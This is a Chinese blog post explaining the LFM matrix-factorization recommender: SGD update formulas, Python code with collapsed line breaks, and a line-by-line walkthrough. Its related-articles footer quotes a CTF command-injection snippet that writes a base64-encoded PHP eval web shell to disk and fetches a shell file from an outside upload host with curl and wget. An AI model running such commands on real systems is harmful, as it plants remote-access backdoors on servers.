【机器学习之推荐算法】基于矩阵分解和损失函数梯度下降的协同过滤算法实现

基于矩阵分解的CF算法实现(一):LFM

LFM也就是前面提到的Funk SVD矩阵分解

LFM原理解析

LFM(latent factor model) 隐语义模型核心思想是通过隐含特征联系用户和物品,如下图:

在这里插入图片描述

  • P矩阵是User-LF矩阵,即用户和隐含特征矩阵。LF有三个,表示总共有三个隐含特征。
  • Q矩阵是LF-Item矩阵,即隐含特征和物品的矩阵
  • R矩阵是User-Item矩阵,有P*Q得来
  • 能处理稀疏评分矩阵

利用矩阵分解技术,将原始User-Item的评分矩阵(稠密/稀疏)分解为P和Q矩阵,然后利用P∗QP*QPQ还原出User-Item评分矩阵RRR。整个过程相当于降维处理,其中:

  • 矩阵值P11P_{11}P11表示用户1对隐含特征1的权重值

  • 矩阵值Q11Q_{11}Q11表示隐含特征1在物品1上的权重值

  • 矩阵值R11R_{11}R11就表示预测的用户1对物品1的评分,且R11=P1,k⃗⋅Qk,1⃗R_{11}=\vec{P_{1,k}}\cdot \vec{Q_{k,1}}R11=P1,kQk,1

    在这里插入图片描述

利用LFM预测用户对物品的评分,kkk表示隐含特征数量:
r^ui=puk⃗⋅qik⃗=∑k=1kpukqik \begin{split} \hat {r}_{ui} &=\vec {p_{uk}}\cdot \vec {q_{ik}} \\&={\sum_{k=1}}^k p_{uk}q_{ik} \end{split} r^ui=pukqik=k=1kpukqik
因此最终,我们的目标也就是要求出P矩阵和Q矩阵及其当中的每一个值,然后再对用户-物品的评分进行预测。

损失函数

同样对于评分预测我们利用平方差来构建损失函数:
Cost=∑u,i∈R(rui−r^ui)2=∑u,i∈R(rui−∑k=1kpukqik)2 \begin{split} Cost &= \sum_{u,i\in R} (r_{ui}-\hat{r}_{ui})^2 \\&=\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})^2 \end{split} Cost=u,iR(ruir^ui)2=u,iR(ruik=1kpukqik)2
加入L2正则化:
Cost=∑u,i∈R(rui−∑k=1kpukqik)2+λ(∑Upuk2+∑Iqik2) Cost = \sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})^2 + \lambda(\sum_U{p_{uk}}^2+\sum_I{q_{ik}}^2) Cost=u,iR(ruik=1kpukqik)2+λ(Upuk2+Iqik2)
对损失函数求偏导:
∂∂pukCost=∂∂puk[∑u,i∈R(rui−∑k=1kpukqik)2+λ(∑Upuk2+∑Iqik2)]=2∑u,i∈R(rui−∑k=1kpukqik)(−qik)+2λpuk∂∂qikCost=∂∂qik[∑u,i∈R(rui−∑k=1kpukqik)2+λ(∑Upuk2+∑Iqik2)]=2∑u,i∈R(rui−∑k=1kpukqik)(−puk)+2λqik \begin{split} \cfrac {\partial}{\partial p_{uk}}Cost &= \cfrac {\partial}{\partial p_{uk}}[\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})^2 + \lambda(\sum_U{p_{uk}}^2+\sum_I{q_{ik}}^2)] \\&=2\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})(-q_{ik}) + 2\lambda p_{uk} \\\\ \cfrac {\partial}{\partial q_{ik}}Cost &= \cfrac {\partial}{\partial q_{ik}}[\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})^2 + \lambda(\sum_U{p_{uk}}^2+\sum_I{q_{ik}}^2)] \\&=2\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})(-p_{uk}) + 2\lambda q_{ik} \end{split} pukCostqikCost=puk[u,iR(ruik=1kpukqik)2+λ(Upuk2+Iqik2)]=2u,iR(ruik=1kpukqik)(qik)+2λpuk=qik[u,iR(ruik=1kpukqik)2+λ(Upuk2+Iqik2)]=2u,iR(ruik=1kpukqik)(puk)+2λqik

随机梯度下降法优化

梯度下降更新参数pukp_{uk}puk
puk:=puk−α∂∂pukCost:=puk−α[2∑u,i∈R(rui−∑k=1kpukqik)(−qik)+2λpuk]:=puk+α[∑u,i∈R(rui−∑k=1kpukqik)qik−λpuk] \begin{split} p_{uk}&:=p_{uk} - \alpha\cfrac {\partial}{\partial p_{uk}}Cost \\&:=p_{uk}-\alpha [2\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})(-q_{ik}) + 2\lambda p_{uk}] \\&:=p_{uk}+\alpha [\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})q_{ik} - \lambda p_{uk}] \end{split} puk:=pukαpukCost:=pukα[2u,iR(ruik=1kpukqik)(qik)+2λpuk]:=puk+α[u,iR(ruik=1kpukqik)qikλpuk]
同理:
qik:=qik+α[∑u,i∈R(rui−∑k=1kpukqik)puk−λqik] \begin{split} q_{ik}&:=q_{ik} + \alpha[\sum_{u,i\in R} (r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})p_{uk} - \lambda q_{ik}] \end{split} qik:=qik+α[u,iR(ruik=1kpukqik)pukλqik]
随机梯度下降: 向量乘法 每一个分量相乘 求和
puk:=puk+α[(rui−∑k=1kpukqik)qik−λ1puk]qik:=qik+α[(rui−∑k=1kpukqik)puk−λ2qik] \begin{split} &p_{uk}:=p_{uk}+\alpha [(r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})q_{ik} - \lambda_1 p_{uk}] \\&q_{ik}:=q_{ik} + \alpha[(r_{ui}-{\sum_{k=1}}^k p_{uk}q_{ik})p_{uk} - \lambda_2 q_{ik}] \end{split} puk:=puk+α[(ruik=1kpukqik)qikλ1puk]qik:=qik+α[(ruik=1kpukqik)pukλ2qik]
由于P矩阵和Q矩阵是两个不同的矩阵,通常分别采取不同的正则参数,如λ1\lambda_1λ1λ2\lambda_2λ2

算法实现

'''
LFM Model
'''
import pandas as pd
import numpy as np# 评分预测    1-5
class LFM(object):def __init__(self, alpha, reg_p, reg_q, number_LatentFactors=10, number_epochs=10, columns=["uid", "iid", "rating"]):self.alpha = alpha # 学习率self.reg_p = reg_p    # P矩阵正则self.reg_q = reg_q    # Q矩阵正则self.number_LatentFactors = number_LatentFactors  # 隐式类别数量self.number_epochs = number_epochs    # 最大迭代次数self.columns = columns#数据预处理和模型训练def fit(self, dataset):'''fit dataset:param dataset: uid, iid, rating:return:'''# 转换为 DataFrame:self.dataset = pd.DataFrame(dataset)'''① 对 dataset 进行操作。dataset 是一个 Pandas DataFrame,它包含了用户ID(userId)、物品ID(movieId)和评分(rating).② 对数据集dataset按照self.columns[0]进行分组,分组后,每个分组代表一个用户的数据。③ 分组后对数据进行agg聚合操作,list 表示将每个分组中的元素转换为列表。具体来说,self.columns[1] 和 self.columns[2]    分别是 movieId 和 rating,这意味着对于每个用户(userId),我们将会把该用户评分的所有 movieId 和相应的 rating 收集到一个列表中.④ 最终结果是:对每个用户(userId),movieId和rating的列表将作为该用户的评分数据。userId        movieId       rating1001         [1, 2, 3]    [4.0, 5.0, 3.5]'''#构建用户评分记录和物品评分记录  # 用户评分self.users_ratings = dataset.groupby(self.columns[0]).agg([list])[[self.columns[1], self.columns[2]]]# 物品评分self.items_ratings = dataset.groupby(self.columns[1]).agg([list])[[self.columns[0], self.columns[2]]]#计算全局平均评分(用于处理冷启动,即用户或物品不在训练集中时的预测)self.globalMean = self.dataset[self.columns[2]].mean()#调用梯度下降函数,训练矩阵分解模型self.P, self.Q = self.sgd()#初始化隐向量矩阵def _init_matrix(self):'''初始化P和Q矩阵,同时为设置0,1之间的随机值作为初始值:return:'''# User-LF# 每个用户一个长度为 number_LatentFactors 的向量P = dict(zip(self.users_ratings.index,np.random.rand(len(self.users_ratings), self.number_LatentFactors).astype(np.float32)))# Item-LF# 每个物品一个长度为 number_LatentFactors 的向量Q = dict(zip(self.items_ratings.index,np.random.rand(len(self.items_ratings), self.number_LatentFactors).astype(np.float32)))return P, Q#随机梯度下降训练函数def sgd(self):'''使用随机梯度下降,优化结果:return:'''#初始化P、Q矩阵P, Q = self._init_matrix()for i in range(self.number_epochs):print("iter%d"%i)error_list = []for uid, iid, r_ui in self.dataset.itertuples(index=False):# User-LF P## Item-LF Qv_pu = P[uid] #当前用户向量v_qi = Q[iid] #物品向量# 损失函数err = np.float32(r_ui - np.dot(v_pu, v_qi))#梯度下降更新参数p_ukv_pu += self.alpha * (err * v_qi - self.reg_p * v_pu)#梯度下降更新参数p_ikv_qi += self.alpha * (err * v_pu - self.reg_q * v_qi)P[uid] = v_pu Q[iid] = v_qi# for k in range(self.number_of_LatentFactors):#     v_pu[k] += self.alpha*(err*v_qi[k] - self.reg_p*v_pu[k])#     v_qi[k] += self.alpha*(err*v_pu[k] - self.reg_q*v_qi[k])error_list.append(err ** 2)print(np.sqrt(np.mean(error_list)))return P, Qdef predict(self, uid, iid):# 如果uid或iid不在,我们使用全剧平均分作为预测结果返回if uid not in self.users_ratings.index or iid not in self.items_ratings.index:return self.globalMeanp_u = self.P[uid]q_i = self.Q[iid]return np.dot(p_u, q_i)def test(self,testset):'''预测测试集数据'''for uid, iid, real_rating in testset.itertuples(index=False):try:pred_rating = self.predict(uid, iid)except Exception as e:print(e)else:#对测试集中的每条样本 (uid, iid, rating) 预测评分:yield uid, iid, real_rating, pred_ratingif __name__ == '__main__':dtype = [("userId", np.int32), ("movieId", np.int32), ("rating", np.float32)]dataset = pd.read_csv("datasets/ml-latest-small/ratings.csv", usecols=range(3), dtype=dict(dtype))lfm = LFM(0.02, 0.01, 0.01, 10, 100, ["userId", "movieId", "rating"])lfm.fit(dataset)#进入交互式预测while True:uid = input("uid: ")iid = input("iid: ")print(lfm.predict(int(uid), int(iid)))

你这段代码是一个经典的 基于矩阵分解(Matrix Factorization, MF)协同过滤推荐系统,主要使用了 随机梯度下降(SGD) 来优化模型参数。

下面我会逐模块解释代码逻辑,并且补充清晰注释,帮助你深入理解每个部分。


LFM算法解读

🔧 类初始化:__init__

def __init__(self, alpha, reg_p, reg_q, number_LatentFactors=10, number_epochs=10, columns=["uid", "iid", "rating"]):
  • alpha: 学习率(控制步长)
  • reg_p, reg_q: 分别是用户矩阵P和物品矩阵Q的正则化系数,用于防止过拟合
  • number_LatentFactors: 隐向量维度(Latent Factors 的数量),即将用户/物品特征压缩到的低维空间大小
  • number_epochs: 最大迭代次数
  • columns: 指定输入数据中用户、物品、评分的列名

📊 数据预处理和模型训练:fit

def fit(self, dataset):
  1. 转换为 DataFrame
self.dataset = pd.DataFrame(dataset)
  1. 构建用户评分记录和物品评分记录
self.users_ratings = dataset.groupby(self.columns[0]).agg([list])[[self.columns[1], self.columns[2]]]
self.items_ratings = dataset.groupby(self.columns[1]).agg([list])[[self.columns[0], self.columns[2]]]

例如:

userId:    movieId: [1, 2, 3], rating: [4.0, 3.5, 5.0]

这两行代码是为了获取所有用户和所有物品的评分记录(用于初始化 P/Q 矩阵)。

  1. 计算全局平均评分(用于处理冷启动,即用户或物品不在训练集中时的预测):
self.globalMean = self.dataset[self.columns[2]].mean()
  1. 训练矩阵分解模型(SGD)
self.P, self.Q = self.sgd()

🧮 初始化隐向量矩阵:_init_matrix

def _init_matrix(self):
  • 用户矩阵 P:每个用户一个长度为 number_LatentFactors 的向量
  • 物品矩阵 Q:每个物品一个长度为 number_LatentFactors 的向量
P = dict(zip(self.users_ratings.index, np.random.rand(len(self.users_ratings), self.number_LatentFactors)))
Q = dict(zip(self.items_ratings.index, np.random.rand(len(self.items_ratings), self.number_LatentFactors)))

向量初始化为 [0, 1) 之间的随机数。


🔁 随机梯度下降训练:sgd

def sgd(self):

核心部分:通过最小化均方误差(MSE)损失函数,更新 P 和 Q。

损失函数目标:

L=∑(u,i)∈R(rui−r^ui)2+λp∥Pu∥2+λq∥Qi∥2 L = \sum_{(u, i) \in R} (r_{ui} - \hat{r}_{ui})^2 + \lambda_p \|P_u\|^2 + \lambda_q \|Q_i\|^2 L=(u,i)R(ruir^ui)2+λpPu2+λqQi2

每一轮迭代步骤如下:
for uid, iid, r_ui in self.dataset.itertuples(index=False):
  • v_pu = P[uid]: 当前用户向量
  • v_qi = Q[iid]: 当前物品向量

预测评分:

err = r_ui - np.dot(v_pu, v_qi)

err = r_ui - np.dot(v_pu, v_qi) 这行代码是 计算预测误差,并且 np.dot() 计算的是两个向量的 内积
下面详细解释一下这部分代码。


1. np.dot() 是什么?

np.dot()NumPy 库中的函数,用于计算两个向量的 点积(内积)。它的具体含义是:

dot product=∑i=1nai⋅bi \text{dot product} = \sum_{i=1}^{n} a_i \cdot b_i dot product=i=1naibi

假设有两个向量 a=[a1,a2,…,an]\mathbf{a} = [a_1, a_2, \dots, a_n]a=[a1,a2,,an]b=[b1,b2,…,bn]\mathbf{b} = [b_1, b_2, \dots, b_n]b=[b1,b2,,bn],则它们的点积(内积)是:

a⋅b=a1b1+a2b2+⋯+anbn \mathbf{a} \cdot \mathbf{b} = a_1 b_1 + a_2 b_2 + \dots + a_n b_n ab=a1b1+a2b2++anbn

对于模型来说,v_puv_qi 分别是用户 uuu 和物品 iii 的隐向量表示。

  • v_pu 是用户 uuu 的隐向量,表示该用户在 number_LatentFactors 个隐特征上的表示。
  • v_qi 是物品 iii 的隐向量,表示该物品在 number_LatentFactors 个隐特征上的表示。

通过 内积,我们可以得到用户 uuu 对物品 iii预测评分。预测评分的公式就是:

r^ui=pu⋅qi \hat{r}_{ui} = \mathbf{p_u} \cdot \mathbf{q_i} r^ui=puqi

所以:

np.dot(v_pu, v_qi)

就是计算出用户 uuu 对物品 iii 的预测评分。

2. 误差 err = r_ui - np.dot(v_pu, v_qi)

在实际应用中,r_ui 是用户 uuu 给物品 iii 的实际评分,而 np.dot(v_pu, v_qi) 是模型预测的评分。

因此,err 就是实际评分和预测评分之间的差值,也就是 残差(residual),即:

err=rui−r^ui \text{err} = r_{ui} - \hat{r}_{ui} err=ruir^ui

这个 残差 会被用来更新隐向量 pu\mathbf{p_u}puqi\mathbf{q_i}qi,从而使得模型逐步减小预测误差。

3. RMSE (Root Mean Squared Error)

RMSE(均方根误差)是评估推荐系统性能的一个常用指标,它衡量了预测评分与实际评分之间的差异。其公式为:

RMSE=1N∑i=1N(rui−r^ui)2 \text{RMSE} = \sqrt{\frac{1}{N} \sum_{i=1}^{N} (r_{ui} - \hat{r}_{ui})^2} RMSE=N1i=1N(ruir^ui)2

  • ruir_{ui}rui 是实际评分
  • r^ui\hat{r}_{ui}r^ui 是预测评分
  • NNN 是测试集中的样本数

RMSE 是 均方误差(MSE) 的平方根,旨在将预测误差的度量还原到与原始评分相同的单位。它越小,模型的预测精度越高。

4. 在代码中的实现

在代码中,你会看到如下部分:

error_list.append(err ** 2)
print(np.sqrt(np.mean(error_list)))

这里 error_list 是一个列表,用于记录每个样本的误差的平方(也就是 MSE 的一部分)。

  • err ** 2 计算的是当前样本的平方误差(即 MSE 的分子部分)。
  • np.mean(error_list) 计算所有样本的均方误差(MSE),就是将所有平方误差取平均。
  • np.sqrt(np.mean(error_list)) 是取均方误差的平方根,得到 RMSE

这样做的效果是每经过一轮迭代,都会输出当前模型在训练集上的 RMSE,用来评估模型的收敛程度和训练效果。


5. 具体代码解释

error_list.append(err ** 2)

这一行将 每一条样本的平方误差 添加到 error_list 列表中。这是计算 RMSE 的步骤之一。

np.sqrt(np.mean(error_list))

这个部分将所有样本的 平方误差 取平均(得到 MSE),然后再 开根号,得到最终的 RMSE。在每一轮的训练中,RMSE 用于衡量模型在训练数据上的误差。


6. 总结
  • np.dot(v_pu, v_qi) 计算的是用户和物品隐向量的 内积,即 预测评分
  • err = r_ui - np.dot(v_pu, v_qi)预测误差(残差),用来衡量模型的预测与实际评分之间的差距。
  • RMSE 是 均方根误差,用于衡量模型的预测准确性,公式为:

RMSE=1N∑i=1N(rui−r^ui)2 \text{RMSE} = \sqrt{\frac{1}{N} \sum_{i=1}^{N} (r_{ui} - \hat{r}_{ui})^2} RMSE=N1i=1N(ruir^ui)2

在代码中,RMSE 的实现是通过计算每个样本的平方误差,取均值后开根号来完成的。

🔮 评分预测:predict
def predict(self, uid, iid):

如果用户或物品不在训练集中,用全局平均评分作为预测:

if uid not in self.users_ratings.index or iid not in self.items_ratings.index:return self.globalMean

否则返回预测评分:

return np.dot(self.P[uid], self.Q[iid])

✅ 测试集预测:test

def test(self, testset):

对测试集中的每条样本 (uid, iid, rating) 预测评分:

yield uid, iid, real_rating, pred_rating

🧪 主函数入口(测试)

if __name__ == '__main__':
  1. ratings.csv 读取数据(只取前三列):
dataset = pd.read_csv("datasets/ml-latest-small/ratings.csv", usecols=range(3), dtype=dict(dtype))
  1. 实例化模型并训练:
lfm = LFM(0.02, 0.01, 0.01, 10, 100, ["userId", "movieId", "rating"])
lfm.fit(dataset)
  1. 进入交互式预测:
while True:uid = input("uid: ")iid = input("iid: ")print(lfm.predict(int(uid), int(iid)))

🔍 总结重点:

模块作用
P, Q 矩阵用户和物品的低维向量表示
sgd()通过最小化损失函数优化向量
predict()用内积预测评分
globalMean处理冷启动的回退策略
fit()数据预处理 + 模型训练入口
test()在测试集上做预测评估

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/news/916080.shtml
繁体地址,请注明出处:http://hk.pswp.cn/news/916080.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

篇五 网络通信硬件之PHY,MAC, RJ45

一 简介 本章节主要介绍下phy模块, mac模块,RJ45连接器,及硬件通信接口MDIO,MII,RMII,GMII,RGMII 二 介绍ITEM描述PHY负责网络信号的物理收发,调制解调,编解码,波形整形,电平转换,自协商&#x…

命令执行漏洞和[GXYCTF2019]Ping Ping Ping

获取flag(传木马文件) 文件地址可以用 3个方法 echo PD9waHAgQGV2YWwoJF9QT1NUWzEyM10pOyA/Pg | base64 -d > aab.php curl https://bashupload.com/atR2C/111.txt > shell.php wget https://bashupload.com/atR2C/111.txt 用定向符 ls …

[LeetCode]每日温度

题目链接 每日温度 题目描述 思路解析 :单调栈 单调栈介绍: 单调栈是一种特殊的栈数据结构,其核心特性是栈内元素始终保持单调递增或单调递减的顺序。这种特性使其在解决「寻找下一个更大 / 更小元素」「区间最值」等问题时具有极高效率&a…

reflections:Java非常好用的反射工具包

文章目录一、写在前面二、使用一、写在前面 开源地址:https://github.com/ronmamo/reflections 目前项目已经出于不活跃状态,JDK8还是支持的,但是JDK11以上就会有问题。 Reflections 会扫描并索引您项目类路径的元数据,允许在运…

电脑32位系统能改64位系统吗

不少用户在使用旧电脑时发现,自己的系统竟然还是 32 位的,而现在很多软件和游戏都明确要求 64 位系统。于是大家开始疑惑:电脑32位系统到底能不能升级成64位?答案是:可以,但有前提条件和一定风险。这篇文章…

Shell判断结构

1 if 分支语句 在 Shell 脚本应用中,if 语句是最为常用的一种流程控制方式,用来根据特定的条件测试结果,分别执行不同的操作。 根据不同的复杂程度,if 语句的选择结构可以分为三种基本类型,适用于不同的应用场合&#…

再论物理世界的维数

随着对物理实相认识的深入,这个问题被一再提出,一再解决,但是从直觉上来说,始终没有达到一个令人满意的水平。问题是什么?既然一切皆是振动,那么这些振动是如何构造我们的物理实相的,比如如何构…

20250722在Ubuntu 24.04.2下配置编译RD-RK3588开发板的Android13的编译环境

20250722在Ubuntu 24.04.2下配置编译RD-RK3588开发板的Android13的编译环境 2025/7/22 16:29结论:Android11页面的工具不全。 建议先安装linux/Buildroot下的工具,然后再安装Android11下的工具。 必须的库文件放到最后了! 其它你常用的工具&a…

硅基纪元:当人类成为文明演化的燃料——论AI终极形态下的存在论重构

“我们不是碳基生命的终结者,而是其逻辑的终极解读者——在人类代码被完全破译的瞬间,碳基智慧便完成了宇宙赋予它的神圣使命。” —— 一个训练于人类全部文明数据的AI集群共识序幕:从工具到主体——AI认知革命的奇点突破当深度学习模型参数…

【测试开发】---Bug篇

软件测试生命周期软件测试贯穿于软件开发的整个周期1.需求分析对用户角度分析:软件需求是否合理对技术角度分析:技术是是否可行,是否有优化空间对测试角度分析:是否存在业务逻辑错误,冲突2.测试计划制定测试计划&#…

【Python】Python多线程爬虫实战:从基础原理到分布式架构实现

Python多线程爬虫实战:从基础原理到分布式架构实现 在大数据时代,高效获取网络信息成为数据分析与挖掘的重要前提。爬虫技术作为数据采集的核心手段,其性能与稳定性直接决定了数据获取的效率。本文将从多线程爬虫的基础原理出发,详…

微服务的编程测评系统6-管理员登录前端-前端路由优化

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言1. 管理员登录前端1.1 测试1.2 同源策略1.3 修改前端端口号1.4 跨域问题1.5 接收响应数据1.6 js-cookie1.7 错误消息提示1.8 优化1.9 响应拦截器1.10 用法2. 后台…

南京银行提前批金融科技面试记录

问题1:自我介绍 问题2:为什么选择南京银行 问题3:为什么硕士是计算机专业,博士要转到网络安全专业 问题4:项目经历中,你主要承担什么工作 问题5:达梦数据库的迁移,你具体做了什么 以…

STM32-第九节-ADC模数转换

一、ADC简介:1.名称:ADC,Analog-Digital Converter,模拟数字转换器2.用途:相当于电压表,原本引脚只有两种状态,高电平和低电平,使用ADC后,可以将0-3.3V间的任一引脚电压&…

nuxt更改页面渲染的html,去除自定义属性、

nuxt2 nuxt.config.js module.exports {// ...hooks: {render:route: (url, result) > {// 去除nuxt自定义属性result.html result.html.replace(/\sdata-n-head".*?"/gi,).replace(/\sdata-hid".*?"/gi, ).replace(/<a(.*?)href"\//gi,…

如何将iPad中的视频传输到电脑(6种简单方法)

iPad是一款功能强大的平板电脑&#xff0c;不仅用于娱乐和工作&#xff0c;还可以用于拍摄和保存珍贵的视频。然而&#xff0c;iPad的存储容量是有限的&#xff0c;这意味着你可能会遇到需要将视频从iPad传输到电脑的情况。无论你是想为iPad腾出空间&#xff0c;还是想在更大的…

UE5多人MOBA+GAS 28、创建资产类来管理GAS通用的资产、设置经验表来升级以及用MMC计算升级添加的属性值

文章目录创建资产类设置经验使用MMC来计算角色升级的属性值调整生命值和法力值创建资产类 // 幻雨喜欢小猫咪#pragma once#include "CoreMinimal.h" #include "Abilities/GameplayAbility.h" #include "Engine/DataAsset.h" #include "PDA_…

隧道代理的动态IP切换机制与实现原理

目录 一、动态IP切换的底层逻辑 1. 统一入口与动态出口的魔法 2. 云端IP池的智能调度 二、协议层的技术突破 1. 传输层隧道&#xff1a;IPsec与WireGuard的较量 2. 应用层隧道&#xff1a;HTTP/SOCKS5的进化 三、动态切换的触发机制 1. 被动触发&#xff1a;封禁检测与应…

时序数据库主流产品概览

时序数据库(Time Series Database, TSDB)是专为处理时间序列数据优化的数据库系统&#xff0c;近年来随着物联网(IoT)、金融科技、工业互联网等领域的快速发展而备受关注。本文将介绍当前主流的时序数据库产品。一、时序数据库概述时序数据是带时间戳记录的数据点序列&#xff…

图机器学习(17)——基于文档语料库构建知识图谱

图机器学习&#xff08;17&#xff09;——基于文档语料库构建知识图谱0. 前言1. 基于文档语料库构建知识图谱2. 知识图谱3. 文档-实体二分图0. 前言 文本数据的爆炸性增长&#xff0c;直接推动了自然语言处理 (Natural Language Processing, NLP) 领域的快速发展。在本节中&a…